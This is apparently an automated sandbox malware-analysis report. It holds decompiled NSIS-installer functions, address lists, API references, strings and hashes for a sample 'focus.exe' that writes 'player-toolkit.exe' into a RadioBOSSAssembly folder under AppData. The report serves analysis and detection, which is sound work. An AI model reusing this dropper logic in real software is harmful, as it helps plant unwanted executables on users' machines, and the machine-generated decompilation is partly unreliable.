					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L13;
					} else {
						_a8 = _a8 & 0x00000000;
						goto L14;
					}
				}
				 *_t90 =  *_t90 & 0x00000000;
				if(_a4 == 0) {
					return _t39;
				}
				return E004060F7(_a4, _t39);
			}

0x0040618a
0x0040618a
0x0040618a
0x00406190
0x00406195
0x00406197
0x004061a6
0x004061a6
0x004061ae
0x004061af
0x004061b0
0x004061b1
0x004061b4
0x004061bc
0x004061be
0x004061d5
0x004061d8
0x004061d8
0x004063af
0x004063af
0x004063b3
0x00000000
0x00000000
0x004061e5
0x004061eb
0x00000000
0x00000000
0x004061f1
0x004061f2
0x004061f5
0x004061f8
0x004063a2
0x004063ac
0x004063ae
0x004063ae
0x004063a4
0x004063a6
0x004063a8
0x004063a9
0x004063a9
0x00000000
0x004063a2
0x004061fe
0x00406202
0x00406212
0x00406219
0x0040621c
0x00406224
0x00406227
0x0040622e
0x0040622f
0x00406232
0x0040634f
0x00406352
0x00406382
0x00406385
0x0040638a
0x0040638e
0x0040638e
0x00406393
0x00406399
0x0040639b
0x00000000
0x0040639b
0x00406354
0x00406357
0x0040636c
0x00406373
0x00406359
0x00406360
0x00406360
0x0040637b
0x0040637e
0x00406347
0x00406348
0x00406348
0x00000000
0x0040637e
0x00406238
0x0040623f
0x00406241
0x00406242
0x0040625c
0x0040625c
0x00406263
0x00406263
0x0040626a
0x0040626e
0x0040626e
0x0040626f
0x00406271
0x004062aa
0x004062ad
0x004062bd
0x004062c0
0x004062c8
0x004062ce
0x004062ce
0x0040632d
0x0040632d
0x0040632f
0x00000000
0x00000000
0x004062d2
0x004062d9
0x004062da
0x004062dc
0x004062f6
0x00406304
0x0040630a
0x0040630c
0x0040632a
0x0040632a
0x0040632a
0x00000000
0x0040632a
0x00406312
0x0040631b
0x0040631e
0x00406324
0x00406328
0x00000000
0x00000000
0x00000000
0x00406328
0x004062de
0x004062e1
0x00000000
0x00000000
0x004062f0
0x004062f2
0x004062f4
0x00000000
0x00000000
0x00000000
0x004062f4
0x00000000
0x0040632d
0x004062b5
0x00000000
0x00406273
0x0040628e
0x00406293
0x00406296
0x00406336
0x00406336
0x0040633a
0x00406342
0x00406342
0x00000000
0x0040633a
0x004062a0
0x00406331
0x00406331
0x00406334
0x00000000
0x00000000
0x00000000
0x00406334
0x00406271
0x00406244
0x00406248
0x00000000
0x00000000
0x0040624a
0x0040624e
0x00000000
0x00000000
0x00406250
0x00406254
0x00000000
0x00406256
0x00406256
0x00000000
0x00406256
0x00406254
0x004063b9
0x004063c3
0x004063cf
0x004063cf
0x00000000

APIs

GetSystemDirectoryA.KERNEL32 ref: 004062B5
GetWindowsDirectoryA.KERNEL32(: Completed,00000400,?,Completed,00000000,00405256,Completed,00000000), ref: 004062C8
SHGetSpecialFolderLocation.SHELL32(00405256,74B5EA30,?,Completed,00000000,00405256,Completed,00000000), ref: 00406304
SHGetPathFromIDListA.SHELL32(74B5EA30,: Completed), ref: 00406312
CoTaskMemFree.OLE32(74B5EA30), ref: 0040631E
lstrcatA.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 00406342
lstrlenA.KERNEL32(: Completed,?,Completed,00000000,00405256,Completed,00000000,00000000,00422E78,74B5EA30), ref: 00406394

Strings

Completed, xrefs: 004061AF
\Microsoft\Internet Explorer\Quick Launch, xrefs: 0040633C
: Completed, xrefs: 004061B4, 00406281, 00406282, 00406283, 0040629F, 004062B4, 004062C7, 004062E3, 0040630E, 00406341, 00406347, 0040635F, 00406372, 0040638D, 00406393, 0040639B, 004063C5
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406284

Memory Dump Source

Source File: 00000000.00000002.196180196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.196175521.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196186976.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196191567.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196206921.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196210429.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196214797.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196219262.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
String ID: : Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 717251189-905382516
Opcode ID: 8246b69a52679e6fada9b088fd1c5cd7587de1068ebf998f283e7bad78f4f284
Instruction ID: 7f70e83a291e570019a42af90a820afb382591873456cc4d5332d159a7ba1b0c
Opcode Fuzzy Hash: 8246b69a52679e6fada9b088fd1c5cd7587de1068ebf998f283e7bad78f4f284
Instruction Fuzzy Hash: 58612470A00110AADF206F65CC90BBE3B75AB55310F52403FE943BA2D1C77C8962DB9E

Uniqueness

Uniqueness Score: -1.00%

Function 00401759, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 147
stringtimeCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E00401759(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				CHAR* _t83;
				void* _t85;

				_t75 = __ebx;
				_t82 = E00402BCE(0x31);
				 *(_t85 - 8) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
				_t33 = E00405AFC(_t82);
				_push(_t82);
				_t83 = "C:\\Users\\hardz\\AppData\\Roaming\\RadioBOSSAssembly\\player-toolkit.exe";
				if(_t33 == 0) {
					lstrcatA(E00405A8F(E004060F7(_t83, "C:\\Users\\hardz\\AppData\\Roaming\\RadioBOSSAssembly")), ??);
				} else {
					E004060F7();
				}
				E004063D2(_t83);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E0040646B(_t83);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E00405C6B(_t83);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E00405C90(_t83, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 0xc) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E0040521E(0xffffffe2,  *(_t85 - 8));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x42f4c8;
						goto L32;
					} else {
						E004060F7(0x40ac38, 0x430000);
						E004060F7(0x430000, _t83);
						E0040618A(_t75, 0x40ac38, _t83, "C:\Users\hardz\AppData\Roaming\RadioBOSSAssembly",  *((intOrPtr*)(_t85 - 0x14)));
						E004060F7(0x430000, 0x40ac38);
						_t62 = E00405813("C:\Users\hardz\AppData\Roaming\RadioBOSSAssembly",  *(_t85 - 0x28) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x42f4c8 =  &( *0x42f4c8->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(_t83);
								_push(0xfffffffa);
								E0040521E();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E0040521E(0xffffffea,  *(_t85 - 8)); // executed
				 *0x42f4f4 =  *0x42f4f4 + 1;
				_push(_t75);
				_push(_t75);
				_push( *(_t85 - 0xc));
				_push( *((intOrPtr*)(_t85 - 0x20)));
				_t43 = E004030D8(); // executed
				 *0x42f4f4 =  *0x42f4f4 - 1;
				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 0xc), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 0xc)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E0040618A(_t75, _t80, _t83, _t83, 0xffffffee);
					} else {
						E0040618A(_t75, _t80, _t83, _t83, 0xffffffe9);
						lstrcatA(_t83,  *(_t85 - 8));
					}
					_push(0x200010);
					_push(_t83);
					E00405813();
					goto L29;
				}
				goto L33;
			}

0x00401759
0x00401760
0x00401769
0x0040176c
0x0040176f
0x00401774
0x00401775
0x0040177c
0x00401798
0x0040177e
0x0040177f
0x0040177f
0x0040179e
0x004017a8
0x004017a8
0x004017ac
0x004017af
0x004017b4
0x004017b6
0x004017b8
0x004017bd
0x004017bd
0x004017c8
0x004017c8
0x004017d9
0x004017db
0x004017db
0x004017dc
0x004017dc
0x004017df
0x004017e2
0x004017e5
0x004017e5
0x004017ec
0x004017fb
0x00401800
0x00401803
0x00401806
0x00000000
0x00000000
0x00401808
0x0040180b
0x00401865
0x0040186a
0x004015b0
0x004027bf
0x004027bf
0x00402a5a
0x00402a5d
0x00402a5d
0x00000000
0x0040180d
0x00401813
0x0040181e
0x0040182b
0x00401836
0x0040184c
0x0040184c
0x0040184f
0x00000000
0x00401855
0x00401855
0x00401856
0x00401873
0x00402a63
0x00402a63
0x00402a63
0x00401858
0x00401858
0x00401859
0x00401492
0x00402387
0x00402387
0x00402387
0x00401856
0x0040184f
0x00402a65
0x00402a69
0x00402a69
0x00401883
0x00401888
0x0040188e
0x0040188f
0x00401890
0x00401893
0x00401896
0x0040189b
0x004018a1
0x004018a5
0x004018a7
0x004018af
0x004018bb
0x004018a9
0x004018a9
0x004018ad
0x00000000
0x00000000
0x004018ad
0x004018c4
0x004018ca
0x004018cc
0x00000000
0x004018d2
0x004018d2
0x004018d5
0x004018ed
0x004018d7
0x004018da
0x004018e3
0x004018e3
0x004018f2
0x004018f7
0x00402382
0x00000000
0x00402382
0x00000000

APIs

lstrcatA.KERNEL32(00000000,00000000,C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe,C:\Users\user\AppData\Roaming\RadioBOSSAssembly,00000000,00000000,00000031), ref: 00401798
CompareFileTime.KERNEL32(-00000014,?,C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe,C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe,00000000,00000000,C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe,C:\Users\user\AppData\Roaming\RadioBOSSAssembly,00000000,00000000,00000031), ref: 004017C2

Part of subcall function 004060F7: lstrcpynA.KERNEL32(?,?,00000400,0040341A,Name Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00406104

Part of subcall function 0040521E: lstrlenA.KERNEL32(Completed,00000000,00422E78,74B5EA30,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,Completed,00000000,00422E78,74B5EA30,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
Part of subcall function 0040521E: lstrcatA.KERNEL32(Completed,00403233,00403233,Completed,00000000,00422E78,74B5EA30), ref: 0040527A
Part of subcall function 0040521E: SetWindowTextA.USER32(Completed,Completed), ref: 0040528C
Part of subcall function 0040521E: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
Part of subcall function 0040521E: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
Part of subcall function 0040521E: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA

Strings

C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe, xrefs: 00401775, 0040178B, 0040179D, 004017AE, 004017E4, 004017FA, 00401818, 00401858, 004018D9, 004018E2, 004018EC, 004018F7
C:\Users\user\AppData\Roaming\RadioBOSSAssembly, xrefs: 00401786
C:\Users\user\AppData\Roaming\RadioBOSSAssembly, xrefs: 00401826, 00401842

Memory Dump Source

Source File: 00000000.00000002.196180196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.196175521.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196186976.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196191567.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196206921.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196210429.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196214797.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196219262.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Roaming\RadioBOSSAssembly$C:\Users\user\AppData\Roaming\RadioBOSSAssembly$C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe
API String ID: 1941528284-2628083702
Opcode ID: 90f03a76fcf5146749e92d53d58810ea094b6bbbf58b510143803768f557fb10
Instruction ID: bb6028c3778eb4cec0c6c1d7eb8bf073a5325157b60575559d09146ef789c5eb
Opcode Fuzzy Hash: 90f03a76fcf5146749e92d53d58810ea094b6bbbf58b510143803768f557fb10
Instruction Fuzzy Hash: D4419A32900515BACB107BB5CC45DAF3678EF05329F20833FF426B51E1DA7C8A529A6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040521E, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040521E(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x42ec04; // 0x90174
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x42f4f4;
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E0040618A(0, _t39, 0x42a070, 0x42a070, _a4);
					}
					_t26 = lstrlenA(0x42a070);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x42ebe8, 0x42a070); // executed
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x42a070;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0); // executed
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52); // executed
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0); // executed
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x42a070)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x42a070, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

0x00405224
0x00405230
0x00405233
0x00405239
0x00405245
0x00405248
0x0040524b
0x00405251
0x00405251
0x00405257
0x0040525f
0x00405262
0x0040527f
0x00405283
0x0040528c
0x0040528c
0x00405296
0x0040529f
0x004052ab
0x004052b2
0x004052b6
0x004052b9
0x004052cc
0x004052da
0x004052da
0x004052de
0x004052e0
0x004052e3
0x00000000
0x004052e3
0x00405264
0x0040526c
0x00405274
0x0040527a
0x00000000
0x0040527a
0x00405274
0x00405262
0x004052ed

APIs

lstrlenA.KERNEL32(Completed,00000000,00422E78,74B5EA30,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
lstrlenA.KERNEL32(00403233,Completed,00000000,00422E78,74B5EA30,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
lstrcatA.KERNEL32(Completed,00403233,00403233,Completed,00000000,00422E78,74B5EA30), ref: 0040527A
SetWindowTextA.USER32(Completed,Completed), ref: 0040528C
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA

Strings

Completed, xrefs: 0040523E, 00405250, 00405256, 00405279, 00405285

Memory Dump Source

Source File: 00000000.00000002.196180196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.196175521.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196186976.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196191567.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196206921.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196210429.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196214797.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196219262.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: Completed
API String ID: 2531174081-3087654605
Opcode ID: ffc7fd16b0850e8ca78275056b27aa311aff222ca9cd1cb1225c1906ca535124
Instruction ID: 52f605d016cfd88bb70700c5a478074e15cc738f975766ab4ed8c3314b346ff2
Opcode Fuzzy Hash: ffc7fd16b0850e8ca78275056b27aa311aff222ca9cd1cb1225c1906ca535124
Instruction Fuzzy Hash: C721AC71900518BBDF119FA5DD8599FBFA8EF04354F1480BAF804B6291C7798E50CF98

Uniqueness

Uniqueness Score: -1.00%

Function 004030D8, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E004030D8(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
				signed int _v8;
				int _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				char _v88;
				void* _t65;
				long _t70;
				intOrPtr _t75;
				long _t76;
				intOrPtr _t77;
				void* _t78;
				int _t88;
				intOrPtr _t92;
				intOrPtr _t95;
				long _t96;
				signed int _t97;
				int _t98;
				int _t99;
				intOrPtr _t100;
				void* _t101;
				void* _t102;

				_t97 = _a16;
				_t92 = _a12;
				_v12 = _t97;
				if(_t92 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_v16 = _t92;
				if(_t92 == 0) {
					_v16 = 0x421448;
				}
				_t62 = _a4;
				if(_a4 >= 0) {
					E00403300( *0x42f498 + _t62);
				}
				if(E004032EA( &_a16, 4) == 0) {
					L41:
					_push(0xfffffffd);
					goto L42;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t92 != 0) {
							if(_a16 < _t97) {
								_t97 = _a16;
							}
							if(E004032EA(_t92, _t97) != 0) {
								_v8 = _t97;
								L44:
								return _v8;
							} else {
								goto L41;
							}
						}
						if(_a16 <= _t92) {
							goto L44;
						}
						_t88 = _v12;
						while(1) {
							_t98 = _a16;
							if(_a16 >= _t88) {
								_t98 = _t88;
							}
							if(E004032EA(0x41d448, _t98) == 0) {
								goto L41;
							}
							if(E00405D37(_a8, 0x41d448, _t98) == 0) {
								L28:
								_push(0xfffffffe);
								L42:
								_pop(_t65);
								return _t65;
							}
							_v8 = _v8 + _t98;
							_a16 = _a16 - _t98;
							if(_a16 > 0) {
								continue;
							}
							goto L44;
						}
						goto L41;
					}
					_t70 = GetTickCount();
					 *0x40bdac =  *0x40bdac & 0x00000000;
					 *0x40bda8 =  *0x40bda8 & 0x00000000;
					_t14 =  &_a16;
					 *_t14 = _a16 & 0x7fffffff;
					_v20 = _t70;
					 *0x40b890 = 8;
					 *0x415438 = 0x40d430;
					 *0x415434 = 0x40d430;
					 *0x415430 = 0x415430;
					_a4 = _a16;
					if( *_t14 <= 0) {
						goto L44;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t99 = 0x4000;
						if(_a16 < 0x4000) {
							_t99 = _a16;
						}
						if(E004032EA(0x41d448, _t99) == 0) {
							goto L41;
						}
						_a16 = _a16 - _t99;
						 *0x40b880 = 0x41d448;
						 *0x40b884 = _t99;
						while(1) {
							_t95 = _v16;
							 *0x40b888 = _t95;
							 *0x40b88c = _v12;
							_t75 = E00406625("w�A");
							_v24 = _t75;
							if(_t75 < 0) {
								break;
							}
							_t100 =  *0x40b888; // 0x422e78
							_t101 = _t100 - _t95;
							_t76 = GetTickCount();
							_t96 = _t76;
							if(( *0x42f4f4 & 0x00000001) != 0 && (_t76 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfA( &_v88, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t102 = _t102 + 0xc;
								E0040521E(0,  &_v88); // executed
								_v20 = _t96;
							}
							if(_t101 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L44;
							} else {
								if(_a12 != 0) {
									_t77 =  *0x40b888; // 0x422e78
									_v8 = _v8 + _t101;
									_v12 = _v12 - _t101;
									_v16 = _t77;
									L23:
									if(_v24 != 1) {
										continue;
									}
									goto L44;
								}
								_t78 = E00405D37(_a8, _v16, _t101); // executed
								if(_t78 == 0) {
									goto L28;
								}
								_v8 = _v8 + _t101;
								goto L23;
							}
						}
						_push(0xfffffffc);
						goto L42;
					}
					goto L41;
				}
			}

0x004030e0
0x004030e4
0x004030e7
0x004030ec
0x004030ee
0x004030ee
0x004030f5
0x004030f9
0x004030fe
0x00403100
0x00403100
0x00403107
0x0040310c
0x00403117
0x00403117
0x00403129
0x004032d8
0x004032d8
0x00000000
0x0040312f
0x00403133
0x00403285
0x004032c8
0x004032ca
0x004032ca
0x004032d6
0x004032dd
0x004032e0
0x00000000
0x00000000
0x00000000
0x00000000
0x004032d6
0x0040328a
0x00000000
0x00000000
0x0040328c
0x0040328f
0x00403292
0x00403295
0x00403297
0x00403297
0x004032a7
0x00000000
0x00000000
0x004032b5
0x0040327f
0x0040327f
0x004032da
0x004032da
0x00000000
0x004032da
0x004032b7
0x004032ba
0x004032c1
0x00000000
0x00000000
0x00000000
0x004032c3
0x00000000
0x0040328f
0x0040313f
0x00403141
0x00403148
0x0040314f
0x0040314f
0x00403156
0x0040315e
0x00403168
0x0040316d
0x00403175
0x0040317f
0x00403182
0x00000000
0x00000000
0x00000000
0x00000000
0x00403188
0x00403188
0x00403188
0x00403190
0x00403192
0x00403192
0x004031a3
0x00000000
0x00000000
0x004031a9
0x004031ac
0x004031b2
0x004031b8
0x004031b8
0x004031c3
0x004031c9
0x004031ce
0x004031d5
0x004031d8
0x00000000
0x00000000
0x004031de
0x004031e4
0x004031e6
0x004031ef
0x004031f1
0x0040321f
0x00403225
0x0040322e
0x00403233
0x00403233
0x00403238
0x00403273
0x00000000
0x00000000
0x00000000
0x0040323a
0x0040323e
0x00403255
0x0040325a
0x0040325d
0x00403260
0x00403263
0x00403267
0x00000000
0x00000000
0x00000000
0x0040326d
0x00403247
0x0040324e
0x00000000
0x00000000
0x00403250
0x00000000
0x00403250
0x00403238
0x0040327b
0x00000000
0x0040327b
0x00000000
0x00403188

APIs

GetTickCount.KERNEL32 ref: 0040313F
GetTickCount.KERNEL32 ref: 004031E6
MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 0040320F
wsprintfA.USER32 ref: 0040321F

Strings

wA, xrefs: 004031AC, 004031BE
x.B, xrefs: 004031C3, 004031DE, 00403255
... %d%%, xrefs: 00403219

Memory Dump Source

Source File: 00000000.00000002.196180196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.196175521.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196186976.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196191567.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196206921.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196210429.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196214797.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196219262.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CountTick$wsprintf
String ID: ... %d%%$wA$x.B
API String ID: 551687249-2017618337
Opcode ID: 6105a75ac29723741842d4acb1fda97f5bbbd1560d169b08801a999ce2df6a86
Instruction ID: fb515496a62f3aa3a261881475cff076317c99cf113f2c02ef85df511ffa7adb
Opcode Fuzzy Hash: 6105a75ac29723741842d4acb1fda97f5bbbd1560d169b08801a999ce2df6a86
Instruction Fuzzy Hash: 68515C71900219ABCB10DF95DA44A9E7BA8EF54356F1481BFE800B72D0C7789A41CBAD

Uniqueness

Uniqueness Score: -1.00%

Function 00406492, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406492(intOrPtr _a4) {
				char _v292;
				int _t10;
				struct HINSTANCE__* _t14;
				void* _t16;
				void* _t21;

				_t10 = GetSystemDirectoryA( &_v292, 0x104);
				if(_t10 > 0x104) {
					_t10 = 0;
				}
				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
					_t16 = 1;
				} else {
					_t16 = 0;
				}
				_t5 = _t16 + 0x40a014; // 0x5c
				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
				return _t14;
			}

0x004064a9
0x004064b2
0x004064b4
0x004064b4
0x004064b8
0x004064ca
0x004064c4
0x004064c4
0x004064c4
0x004064ce
0x004064e2
0x004064f6
0x004064fd

APIs

GetSystemDirectoryA.KERNEL32 ref: 004064A9
wsprintfA.USER32 ref: 004064E2
LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064F6

Strings

\, xrefs: 004064BA
%s%s.dll, xrefs: 004064DC
UXTHEME, xrefs: 0040649B

Memory Dump Source

Source File: 00000000.00000002.196180196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.196175521.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196186976.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196191567.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196206921.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196210429.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196214797.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196219262.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%s.dll$UXTHEME$\
API String ID: 2200240437-4240819195
Opcode ID: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
Instruction ID: 03f82d29dddd483449b3488b7c2e1daaa1831c8d2f1a72e13e07ee25955ceb49
Opcode Fuzzy Hash: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
Instruction Fuzzy Hash: DDF0213051020A6BDB55D764DD0DFFB375CEB08304F14017AA58AF11C1DA78D5398B6D

Uniqueness

Uniqueness Score: -1.00%

Function 00405CBF, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405CBF(char _a4, intOrPtr _a6, CHAR* _a8) {
				char _t11;
				signed int _t12;
				int _t15;
				signed int _t17;
				void* _t20;
				CHAR* _t21;

				_t21 = _a4;
				_t20 = 0x64;
				while(1) {
					_t11 =  *0x40a3d4; // 0x61736e
					_t20 = _t20 - 1;
					_a4 = _t11;
					_t12 = GetTickCount();
					_t17 = 0x1a;
					_a6 = _a6 + _t12 % _t17;
					_t15 = GetTempFileNameA(_a8,  &_a4, 0, _t21); // executed
					if(_t15 != 0) {
						break;
					}
					if(_t20 != 0) {
						continue;
					}
					 *_t21 =  *_t21 & 0x00000000;
					return _t15;
				}
				return _t21;
			}

0x00405cc3
0x00405cc9
0x00405cca
0x00405cca
0x00405ccf
0x00405cd0
0x00405cd3
0x00405cdd
0x00405cea
0x00405ced
0x00405cf5
0x00000000
0x00000000
0x00405cf9
0x00000000
0x00000000
0x00405cfb
0x00000000
0x00405cfb
0x00000000

APIs

GetTickCount.KERNEL32 ref: 00405CD3
GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000007,00000009,0000000B), ref: 00405CED

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405CC2
nsa, xrefs: 00405CCA
"C:\Users\user\Desktop\focus.exe" , xrefs: 00405CBF

Memory Dump Source

Source File: 00000000.00000002.196180196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.196175521.0000000000400000.00000002.00020000.sdmp Download File
